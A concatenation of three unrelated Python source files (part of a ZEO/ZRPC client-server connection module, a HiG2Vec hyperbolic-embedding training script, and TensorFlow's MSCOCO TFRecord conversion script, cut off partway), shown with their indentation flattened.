# Subclass must implement. handshake() is called by the constructor,
# near its end, but before self is added to asyncore's socket map.
# When a connection is created the first message sent is a 4-byte
# protocol version. This allows the protocol to evolve over time, and
# lets servers handle clients using multiple versions of the protocol.
# In general, the server's handshake() just needs to send the server's
# preferred protocol; the client's also needs to queue (delay) outgoing
# messages until it sees the handshake from the server.
def handshake(self):
raise NotImplementedError
# Replaces message_input() for the first message received. Records the
# protocol sent by the peer in `peer_protocol_version`, restores the
# normal message_input() method, and raises an exception if the peer's
# protocol is unacceptable. That's all the server needs to do. The
# client needs to do additional work in response to the server's
# handshake, and extends this method.
def recv_handshake(self, proto):
# Extended by ManagedClientConnection.
del self.message_input # uncover normal-case message_input()
self.peer_protocol_version = proto
if self.tag == b'C':
good_protos = self.servers_we_can_talk_to
else:
assert self.tag == b'S'
good_protos = self.clients_we_can_talk_to
if proto in good_protos:
self.log("received handshake %r" % proto, level=logging.INFO)
else:
self.log("bad handshake %s" % short_repr(proto),
level=logging.ERROR)
raise ZRPCError("bad handshake %r" % proto)
def message_input(self, message):
"""Decode an incoming message and dispatch it"""
# If something goes wrong during decoding, the marshaller
# will raise an exception. The exception will ultimately
# result in asycnore calling handle_error(), which will
# close the connection.
msgid, async_, name, args = self.decode(message)
if debug_zrpc:
self.log("recv msg: %s, %s, %s, %s" % (msgid, async_, name,
short_repr(args)),
level=TRACE)
if name == 'loadEx':
# Special case and inline the heck out of load case:
try:
ret = self.obj.loadEx(*args)
except (SystemExit, KeyboardInterrupt):
raise
except Exception as msg:
if not isinstance(msg, self.unlogged_exception_types):
self.log("%s() raised exception: %s" % (name, msg),
logging.ERROR, exc_info=True)
self.return_error(msgid, *sys.exc_info()[:2])
else:
try:
self.message_output(self.fast_encode(msgid, 0, REPLY, ret))
self.poll()
except:
# Fall back to normal version for better error handling
self.send_reply(msgid, ret)
elif name == REPLY:
assert not async_
self.handle_reply(msgid, args)
else:
self.handle_request(msgid, async_, name, args)
def handle_request(self, msgid, async_, name, args):
obj = self.obj
if name.startswith('_') or not hasattr(obj, name):
if obj is None:
if debug_zrpc:
self.log("no object calling %s%s"
% (name, short_repr(args)),
level=logging.DEBUG)
return
msg = "Invalid method name: %s on %s" % (name, repr(obj))
raise ZRPCError(msg)
if debug_zrpc:
self.log("calling %s%s" % (name, short_repr(args)),
level=logging.DEBUG)
meth = getattr(obj, name)
try:
self.waiting_for_reply = True
try:
ret = meth(*args)
finally:
self.waiting_for_reply = False
except (SystemExit, KeyboardInterrupt):
raise
except Exception as msg:
if not isinstance(msg, self.unlogged_exception_types):
self.log("%s() raised exception: %s" % (name, msg),
logging.ERROR, exc_info=True)
error = sys.exc_info()[:2]
if async_:
self.log("Asynchronous call raised exception: %s" % self,
level=logging.ERROR, exc_info=True)
else:
self.return_error(msgid, *error)
return
if async_:
if ret is not None:
raise ZRPCError("async method %s returned value %s" %
(name, short_repr(ret)))
else:
if debug_zrpc:
self.log("%s returns %s" % (name, short_repr(ret)),
logging.DEBUG)
if isinstance(ret, Delay):
ret.set_sender(msgid, self)
else:
self.send_reply(msgid, ret, not self.delay_sesskey)
if self.delay_sesskey:
self.__super_setSessionKey(self.delay_sesskey)
self.delay_sesskey = None
def return_error(self, msgid, err_type, err_value):
# Note that, ideally, this should be defined soley for
# servers, but a test arranges to get it called on
# a client. Too much trouble to fix it now. :/
if not isinstance(err_value, Exception):
err_value = err_type, err_value
# encode() can pass on a wide variety of exceptions from cPickle.
# While a bare `except` is generally poor practice, in this case
# it's acceptable -- we really do want to catch every exception
# cPickle may raise.
try:
msg = self.encode(msgid, 0, REPLY, (err_type, err_value))
except: # see above
try:
r = short_repr(err_value)
except:
r = "<unreprable>"
err = ZRPCError("Couldn't pickle error %.100s" % r)
msg = self.encode(msgid, 0, REPLY, (ZRPCError, err))
self.message_output(msg)
self.poll()
def handle_error(self):
if sys.exc_info()[0] == SystemExit:
raise sys.exc_info()
self.log("Error caught in asyncore",
level=logging.ERROR, exc_info=True)
self.close()
def setSessionKey(self, key):
if self.waiting_for_reply:
self.delay_sesskey = key
else:
self.__super_setSessionKey(key)
def send_call(self, method, args, async_=False):
# send a message and return its msgid
if async_:
msgid = 0
else:
msgid = self._new_msgid()
if debug_zrpc:
self.log("send msg: %d, %d, %s, ..." % (msgid, async_, method),
level=TRACE)
buf = self.encode(msgid, async_, method, args)
self.message_output(buf)
return msgid
def callAsync(self, method, *args):
if self.closed:
raise DisconnectedError()
self.send_call(method, args, 1)
self.poll()
def callAsyncNoPoll(self, method, *args):
# Like CallAsync but doesn't poll. This exists so that we can
# send invalidations atomically to all clients without
# allowing any client to sneak in a load request.
if self.closed:
raise DisconnectedError()
self.send_call(method, args, 1)
def callAsyncNoSend(self, method, *args):
# Like CallAsync but doesn't poll. This exists so that we can
# send invalidations atomically to all clients without
# allowing any client to sneak in a load request.
if self.closed:
raise DisconnectedError()
self.send_call(method, args, 1)
self.call_from_thread()
def callAsyncIterator(self, iterator):
"""Queue a sequence of calls using an iterator
The calls will not be interleaved with other calls from the same
client.
"""
self.message_output(self.encode(0, 1, method, args)
for method, args in iterator)
def handle_reply(self, msgid, ret):
assert msgid == -1 and ret is None
def poll(self):
"""Invoke asyncore mainloop to get pending message out."""
if debug_zrpc:
self.log("poll()", level=TRACE)
self.trigger.pull_trigger()
# import cProfile, time
class ManagedServerConnection(Connection):
"""Server-side Connection subclass."""
# Exception types that should not be logged:
unlogged_exception_types = (ZODB.POSException.POSKeyError, )
def __init__(self, sock, addr, obj, mgr):
self.mgr = mgr
map = {}
Connection.__init__(self, sock, addr, obj, b'S', map=map)
self.decode = marshal.server_decode
self.trigger = trigger.trigger(map)
self.call_from_thread = self.trigger.pull_trigger
t = threading.Thread(target=server_loop, args=(map,))
t.setName("ManagedServerConnection thread")
t.setDaemon(True)
t.start()
# self.profile = cProfile.Profile()
# def message_input(self, message):
# self.profile.enable()
# try:
# Connection.message_input(self, message)
# finally:
# self.profile.disable()
def handshake(self):
# Send the server's preferred protocol to the client.
self.message_output(self.current_protocol)
def recv_handshake(self, proto):
if proto == b'ruok':
self.message_output(json.dumps(self.mgr.ruok()).encode("ascii"))
self.poll()
Connection.close(self)
else:
Connection.recv_handshake(self, proto)
self.obj.notifyConnected(self)
def close(self):
self.obj.notifyDisconnected()
Connection.close(self)
# self.profile.dump_stats(str(time.time())+'.stats')
def send_reply(self, msgid, ret, immediately=True):
# encode() can pass on a wide variety of exceptions from cPickle.
# While a bare `except` is generally poor practice, in this case
# it's acceptable -- we really do want to catch every exception
# cPickle may raise.
try:
msg = self.encode(msgid, 0, REPLY, ret)
except: # see above
try:
r = short_repr(ret)
except:
r = "<unreprable>"
err = ZRPCError("Couldn't pickle return %.100s" % r)
msg = self.encode(msgid, 0, REPLY, (ZRPCError, err))
self.message_output(msg)
if immediately:
self.poll()
poll = smac.SizedMessageAsyncConnection.handle_write
def server_loop(map):
while len(map) > 1:
try:
asyncore.poll(30.0, map)
except Exception as v:
if v.args[0] != errno.EBADF:
raise
for o in tuple(map.values()):
o.close()
class ManagedClientConnection(Connection):
"""Client-side Connection subclass."""
__super_init = Connection.__init__
base_message_output = Connection.message_output
def __init__(self, sock, addr, mgr):
self.mgr = mgr
# We can't use the base smac's message_output directly because the
# client needs to queue outgoing messages until it's seen the
# initial protocol handshake from the server. So we have our own
# message_ouput() method, and support for initial queueing. This is
# a delicate design, requiring an output mutex to be wholly
# thread-safe.
# Caution: we must set this up before calling the base class
# constructor, because the latter registers us with asyncore;
# we need to guarantee that we'll queue outgoing messages before
# asyncore learns about us.
self.output_lock = threading.Lock()
self.queue_output = True
self.queued_messages = []
# msgid_lock guards access to msgid
self.msgid = 0
self.msgid_lock = threading.Lock()
# replies_cond is used to block when a synchronous call is
# waiting for a response
self.replies_cond = threading.Condition()
self.replies = {}
self.__super_init(sock, addr, None, tag=b'C', map=mgr.map)
self.trigger = mgr.trigger
self.call_from_thread = self.trigger.pull_trigger
self.call_from_thread()
def close(self):
Connection.close(self)
self.replies_cond.acquire()
self.replies_cond.notifyAll()
self.replies_cond.release()
# Our message_ouput() queues messages until recv_handshake() gets the
# protocol handshake from the server.
def message_output(self, message):
self.output_lock.acquire()
try:
if self.queue_output:
self.queued_messages.append(message)
else:
assert not self.queued_messages
self.base_message_output(message)
finally:
self.output_lock.release()
def handshake(self):
# The client waits to see the server's handshake. Outgoing messages
# are queued for the duration. The client will send its own
# handshake after the server's handshake is seen, in recv_handshake()
# below. It will then send any messages queued while waiting.
assert self.queue_output # the constructor already set this
def recv_handshake(self, proto):
# The protocol to use is the older of our and the server's preferred
# protocols.
proto = min(proto, self.current_protocol)
# Restore the normal message_input method, and raise an exception
# if the protocol version is too old.
Connection.recv_handshake(self, proto)
# Tell the server the protocol in use, then send any messages that
# were queued while waiting to hear the server's protocol, and stop
# queueing messages.
self.output_lock.acquire()
try:
self.base_message_output(proto)
for message in self.queued_messages:
self.base_message_output(message)
self.queued_messages = []
self.queue_output = False
finally:
self.output_lock.release()
def _new_msgid(self):
self.msgid_lock.acquire()
try:
msgid = self.msgid
self.msgid = self.msgid + 1
return msgid
finally:
self.msgid_lock.release()
def call(self, method, *args):
if self.closed:
raise DisconnectedError()
msgid = self.send_call(method, args)
r_args = self.wait(msgid)
if (isinstance(r_args, tuple) and len(r_args) > 1
and type(r_args[0]) == exception_type_type
and issubclass(r_args[0], Exception)):
inst = r_args[1]
raise inst # error raised by server
else:
return r_args
def wait(self, msgid):
"""Invoke asyncore mainloop and wait for reply."""
if debug_zrpc:
self.log("wait(%d)" % msgid, level=TRACE)
self.trigger.pull_trigger()
self.replies_cond.acquire()
try:
while 1:
if self.closed:
raise DisconnectedError()
reply = self.replies.get(msgid, self)
if reply is not self:
del self.replies[msgid]
if debug_zrpc:
self.log("wait(%d): reply=%s" %
(msgid, short_repr(reply)), level=TRACE)
return reply
self.replies_cond.wait()
finally:
self.replies_cond.release()
# For testing purposes, it is useful to begin a synchronous call
# but not block waiting for its response.
def _deferred_call(self, method, *args):
if self.closed:
raise DisconnectedError()
msgid = self.send_call(method, args)
self.trigger.pull_trigger()
return msgid
def _deferred_wait(self, msgid):
r_args = self.wait(msgid)
if (isinstance(r_args, tuple)
and type(r_args[0]) == exception_type_type
and issubclass(r_args[0], Exception)):
inst = r_args[1]
raise inst # error raised by server
else:
return r_args
def handle_reply(self, msgid, args):
if debug_zrpc:
self.log("recv reply: %s, %s"
% (msgid, short_repr(args)), level=TRACE)
self.replies_cond.acquire()
try:
self.replies[msgid] = args
self.replies_cond.notifyAll()
finally:
self.replies_cond.release()
def send_reply(self, msgid, ret):
# Whimper. Used to send heartbeat
assert msgid == -1 and ret is None
self.message_output(b'(J\xff\xff\xff\xffK\x00U\x06.replyNt.')
|
embedGO.py | #!/usr/bin/env python3
# The original source code of Poincare Embedding can be found in https://github.com/facebookresearch/poincare-embeddings
# This source code is partially modified for the application to HiG2Vec.
import torch as th
import numpy as np
import logging
import argparse
from hype.sn import Embedding, initialize
from hype import trainGO
from hype.graph import load_edge_list, eval_reconstruction
from hype.checkpoint import LocalCheckpoint
from hype.rsgd import RiemannianSGD
from hype.lorentz import LorentzManifold
from hype.euclidean import EuclideanManifold
from hype.poincare import PoincareManifold
import sys
import json
import torch.multiprocessing as mp
import shutil
import time
th.manual_seed(42)
np.random.seed(42)
MANIFOLDS = {
'lorentz': LorentzManifold,
'euclidean': EuclideanManifold,
'poincare': PoincareManifold
}
def async_eval(adj, q, logQ, opt):
manifold = MANIFOLDS[opt.manifold]()
while True:
temp = q.get()
if temp is None:
return
if not q.empty():
continue
epoch, elapsed, loss, pth = temp
chkpnt = th.load(pth, map_location='cpu')
lt = chkpnt['embeddings']
sqnorms = manifold.pnorm(lt)
# if manifold.pnorm() doesn't work,
# sqnorms = np.sqrt(np.sum(lt.numpy()*lt.numpy(),axis=1))
lmsg = {
'epoch': epoch,
'elapsed': elapsed,
'loss': loss,
'sqnorm_min': sqnorms.min().item(),
'sqnorm_avg': sqnorms.mean().item(),
'sqnorm_max': sqnorms.max().item()
}
logQ.put((lmsg, pth))
# Adapated from:
# https://thisdataguy.com/2017/07/03/no-options-with-argparse-and-python/
class Unsettable(argparse.Action):
def __init__(self, option_strings, dest, nargs=None, **kwargs):
super(Unsettable, self).__init__(option_strings, dest, nargs='?', **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
val = None if option_string.startswith('-no') else values
setattr(namespace, self.dest, val)
def main():
parser = argparse.ArgumentParser(description='Train Hyperbolic Embeddings')
parser.add_argument('-checkpoint', default='/result/HiG2Vec_GOonly.pth',
help='Where to store the model checkpoint')
parser.add_argument('-dset', type=str, required=True,
help='Dataset identifier')
parser.add_argument('-dim', type=int, default=1000,
help='Embedding dimension')
parser.add_argument('-manifold', type=str, default='poincare',
choices=MANIFOLDS.keys(), help='Embedding manifold')
parser.add_argument('-lr', type=float, default=0.3,
help='Learning rate')
parser.add_argument('-epochs', type=int, default=1000,
help='Number of epochs')
parser.add_argument('-batchsize', type=int, default=50,
help='Batchsize')
parser.add_argument('-negs', type=int, default=50,
help='Number of negatives')
parser.add_argument('-burnin', type=int, default=20,
help='Epochs of burn in')
parser.add_argument('-dampening', type=float, default=0.75,
help='Sample dampening during burnin')
parser.add_argument('-ndproc', type=int, default=4,
help='Number of data loading processes')
parser.add_argument('-eval_each', type=int, default=1,
help='Run evaluation every n-th epoch')
parser.add_argument('-fresh', action='store_true', default=False,
help='Override checkpoint')
parser.add_argument('-debug', action='store_true', default=False,
help='Print debuggin output')
parser.add_argument('-gpu', default=0, type=int,
help='Which GPU to run on (-1 for no gpu)')
parser.add_argument('-sym', action='store_true', default=False,
help='Symmetrize dataset')
parser.add_argument('-maxnorm', '-no-maxnorm', default='1',
action=Unsettable, type=int)
parser.add_argument('-sparse', default=False, action='store_true',
help='Use sparse gradients for embedding table')
parser.add_argument('-burnin_multiplier', default=0.01, type=float)
parser.add_argument('-neg_multiplier', default=1.0, type=float)
parser.add_argument('-quiet', action='store_true', default=False)
parser.add_argument('-lr_type', choices=['scale', 'constant'], default='constant')
parser.add_argument('-train_threads', type=int, default=1,
help='Number of threads to use in training when using CPU')
opt = parser.parse_args()
# setup debugging and logigng
log_level = logging.DEBUG if opt.debug else logging.INFO
log = logging.getLogger('lorentz')
logging.basicConfig(level=log_level, format='%(message)s', stream=sys.stdout)
if opt.gpu >= 0 and opt.train_threads > 1:
opt.gpu = -1
log.warning(f'Specified hogwild training with GPU, defaulting to CPU...')
# set default tensor type
th.set_default_tensor_type('torch.DoubleTensor')
# set device
device = th.device(f'cuda:{opt.gpu}' if th.cuda.is_available() and opt.gpu >=0 else 'cpu')
# select manifold to optimize on
manifold = MANIFOLDS[opt.manifold](debug=opt.debug, max_norm=opt.maxnorm)
opt.dim = manifold.dim(opt.dim)
if 'tsv' in opt.dset:
log.info('Using edge list dataloader')
idx, objects, weights = load_edge_list(opt.dset, opt.sym)
model, data, model_name, conf = initialize(
manifold, opt, idx, objects, weights, sparse=opt.sparse
)
else:
log.info("Not adaptive format")
# set burnin parameters
data.neg_multiplier = opt.neg_multiplier
trainGO._lr_multiplier = opt.burnin_multiplier
# Build config string for log
log.info(f'json_conf: {json.dumps(vars(opt))}')
if opt.lr_type == 'scale':
opt.lr = opt.lr * opt.batchsize
# setup optimizer
optimizer = RiemannianSGD(model.optim_params(manifold), lr=opt.lr)
# setup checkpoint
checkpoint = LocalCheckpoint(
opt.checkpoint,
include_in_all={'conf' : vars(opt), 'objects' : objects},
start_fresh=opt.fresh
)
# get state from checkpoint
state = checkpoint.initialize({'epoch': 0, 'model': model.state_dict()})
model.load_state_dict(state['model'])
opt.epoch_start = state['epoch']
adj = {}
for inputs, _ in data:
for row in inputs:
x = row[0].item()
y = row[1].item()
if x in adj:
adj[x].add(y)
else:
adj[x] = {y}
controlQ, logQ = mp.Queue(), mp.Queue()
control_thread = mp.Process(target=async_eval, args=(adj, controlQ, logQ, opt))
control_thread.start()
# control closure
def control(model, epoch, elapsed, loss):
"""
Control thread to evaluate embedding
"""
lt = model.w_avg if hasattr(model, 'w_avg') else model.lt.weight.data
manifold.normalize(lt)
checkpoint.path = f'{opt.checkpoint}.{epoch}'
checkpoint.save({
'model': model.state_dict(),
'embeddings': lt,
'epoch': epoch,
'manifold': opt.manifold,
})
controlQ.put((epoch, elapsed, loss, checkpoint.path))
while not logQ.empty():
lmsg, pth = logQ.get()
shutil.move(pth, opt.checkpoint)
log.info(f'json_stats: {json.dumps(lmsg)}')
control.checkpoint = True
model = model.to(device)
if hasattr(model, 'w_avg'):
model.w_avg = model.w_avg.to(device)
if opt.train_threads > 1:
threads = []
model = model.share_memory()
args = (device, model, data, optimizer, opt, log)
kwargs = {'ctrl': control, 'progress' : not opt.quiet}
for i in range(opt.train_threads):
kwargs['rank'] = i
threads.append(mp.Process(target=trainGO.train, args=args, kwargs=kwargs))
threads[-1].start()
[t.join() for t in threads]
else:
trainGO.train(device, model, data, optimizer, opt, log, ctrl=control,
progress=not opt.quiet)
controlQ.put(None)
control_thread.join()
while not logQ.empty():
lmsg, pth = logQ.get()
shutil.move(pth, opt.checkpoint)
log.info(f'json_stats: {json.dumps(lmsg)}')
if __name__ == '__main__':
start_time = time.time()
main()
print("--- %s seconds ---" % (time.time() - start_time))
|
build_mscoco_data.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from collections import Counter
from collections import namedtuple
from datetime import datetime
import json
import os.path
import random
import sys
import threading
import nltk.tokenize
import numpy as np
import tensorflow as tf
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
"Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
"Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
"Training captions JSON file.")
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_val2014.json",
"Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 256,
"Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
"Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
"Number of shards in testing TFRecord files.")
tf.flags.DEFINE_string("start_word", "<S>",
"Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
"Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
"Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
"The minimum number of occurrences of each word in the "
"training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
"Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
"Number of threads to preprocess the images.")
FLAGS = tf.flags.FLAGS
ImageMetadata = namedtuple("ImageMetadata",
["image_id", "filename", "captions"])
class Vocabulary(object):
"""Simple vocabulary wrapper."""
def __init__(self, vocab, unk_id):
"""Initializes the vocabulary.
Args:
vocab: A dictionary of word to word_id.
unk_id: Id of the special 'unknown' word.
"""
self._vocab = vocab
self._unk_id = unk_id
def word_to_id(self, word):
"""Returns the integer id of a word string."""
if word in self._vocab:
return self._vocab[word]
else:
return self._unk_id
class ImageDecoder(object):
"""Helper class for decoding images in TensorFlow."""
def __init__(self):
# Create a single TensorFlow Session for all image decoding calls.
self._sess = tf.Session()
# TensorFlow ops for JPEG decoding.
self._encoded_jpeg = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)
def decode_jpeg(self, encoded_jpeg):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._encoded_jpeg: encoded_jpeg})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto."""
if type(value) is str:
value = value.encode()
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature_list(values):
"""Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])
def _bytes_feature_list(values):
"""Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])
def _to_sequence_example(image, decoder, vocab):
"""Builds a SequenceExample proto for an image-caption pair.
Args:
image: An ImageMetadata object.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
Returns:
A SequenceExample proto.
"""
with tf.gfile.FastGFile(image.filename, "rb") as f:
encoded_image = f.read()
try:
decoder.decode_jpeg(encoded_image)
except (tf.errors.InvalidArgumentError, AssertionError):
print("Skipping file with invalid JPEG data: %s" % image.filename)
return
context = tf.train.Features(feature={
"image/image_id": _int64_feature(image.image_id),
"image/data": _bytes_feature(encoded_image),
})
assert len(image.captions) == 1
caption = image.captions[0]
caption_ids = [vocab.word_to_id(word) for word in caption]
feature_lists = tf.train.FeatureLists(feature_list={
"image/caption": _bytes_feature_list(caption),
"image/caption_ids": _int64_feature_list(caption_ids)
})
sequence_example = tf.train.SequenceExample(
context=context, feature_lists=feature_lists)
return sequence_example
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
num_shards):
"""Processes and saves a subset of images as TFRecord files in one thread.
Args:
thread_index: Integer thread identifier within [0, len(ranges)].
ranges: A list of pairs of integers specifying the ranges of the dataset to
process in parallel.
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Each thread produces N shards where N = num_shards / num_threads. For
# instance, if num_shards = 128, and num_threads = 2, then the first thread
# would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_dir, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in images_in_shard:
image = images[i]
sequence_example = _to_sequence_example(image, decoder, vocab)
if sequence_example is not None:
writer.write(sequence_example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print("%s [thread %d]: Processed %d of %d items in thread batch." %
(datetime.now(), thread_index, counter, num_images_in_thread))
sys.stdout.flush()
writer.close()
print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
(datetime.now(), thread_index, counter, num_shards_per_batch))
sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
"""Processes a complete data set and saves it as a TFRecord.
Args:
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Break up each image into a separate entity for each caption.
images = [ImageMetadata(image.image_id, image.filename, [caption])
for image in images for caption in image.captions]
# Shuffle the ordering of images. Make the randomization repeatable.
random.seed(12345)
random.shuffle(images)
# Break the images into num_threads batches. Batch i is defined as
# images[ranges[i][0]:ranges[i][1]].
num_threads = min(num_shards, FLAGS.num_threads)
spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a utility for decoding JPEG images to run sanity checks.
decoder = ImageDecoder()
# Launch a thread for each batch.
print("Launching %d threads for spacings: %s" % (num_threads, ranges))
for thread_index in range(len(ranges)):
args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
t = threading.Thread(target=_process_image_files, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
(datetime.now(), len(images), name))
def _create_vocab(captions):
"""Creates the vocabulary of word to word_id.
The vocabulary is saved to disk in a text file of word counts. The id of each
word in the file is its corresponding 0-based line number.
Args:
captions: A list of lists of strings.
Returns:
A Vocabulary object.
"""
print("Creating vocabulary.")
counter = Counter()
for c in captions:
counter.update(c)
print("Total words:", len(counter))
# Filter uncommon words and sort by descending count.
word_counts = [x for x in list(counter.items()) if x[1] >= FLAGS.min_word_count]
word_counts.sort(key=lambda x: x[1], reverse=True)
print("Words in vocabulary:", len(word_counts))
# Write out the word counts file.
with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
print("Wrote vocabulary file:", FLAGS.word_counts_output_file)
# Create the vocabulary dictionary.
reverse_vocab = [x[0] for x in word_counts]
unk_id = len(reverse_vocab)
vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])
vocab = Vocabulary(vocab_dict, unk_id)
return vocab
def _process_caption(caption):
"""Processes a caption string into a list of tonenized words.
Args:
caption: A string caption.
Returns:
A list of strings; the tokenized caption.
"""
tokenized_caption = [FLAGS.start_word]
tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower()))
tokenized_caption.append(FLAGS.end_word)
return tokenized_caption
def _load_and_process_metadata(captions_file, image_dir):
"""Loads image metadata from a JSON file and processes the captions.
Args:
captions_file: JSON file containing caption annotations.
image_dir: Directory containing the image files.
Returns:
A list of ImageMetadata.
"""
with tf.gfile.FastGFile(captions_file, "r") as f:
caption_data = json.load(f)
# Extract the filenames.
id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]
# Extract the captions. Each image_id is associated with multiple captions.
id_to_captions = {}
for annotation in caption_data["annotations"]:
image_id = annotation["image_id"]
caption = annotation["caption"]
id_to_captions.setdefault(image_id, [])
id_to_captions[image_id].append(caption)
assert len(id_to_filename) == len(id_to_captions)
assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
print("Loaded caption metadata for %d images from %s" %
(len(id_to_filename), captions_file))
# Process the captions and combine the data into a list of ImageMetadata.
print("Processing captions.")
image_metadata = []
num_captions = 0
for image_id, base_filename in id_to_filename:
filename = os.path.join(image_dir, base_filename)
captions = [_process_caption(c) for c in id_to_captions[image_id]]
image_metadata.append(ImageMetadata(image_id, filename, captions))
num_captions += len(captions)
print("Finished processing %d captions for %d images in %s" %
(num_captions, len(id_to_filename), captions_file))
return image_metadata
def main(unused_argv):
def _is_valid_num_shards(num_shards):
"""Returns True if num_shards is compatible with FLAGS.num_threads."""
return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads
assert _is_valid_num_shards(FLAGS.train_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
assert _is_valid_num_shards(FLAGS.val_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
assert _is_valid_num_shards(FLAGS.test_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
if not tf.gfile.IsDirectory(FLAGS.output_dir):
tf.gfile.MakeDirs(FLAGS.output_dir)
# Load image metadata from caption files.
mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
FLAGS.train_image_dir)
mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
FLAGS.val_image_dir)
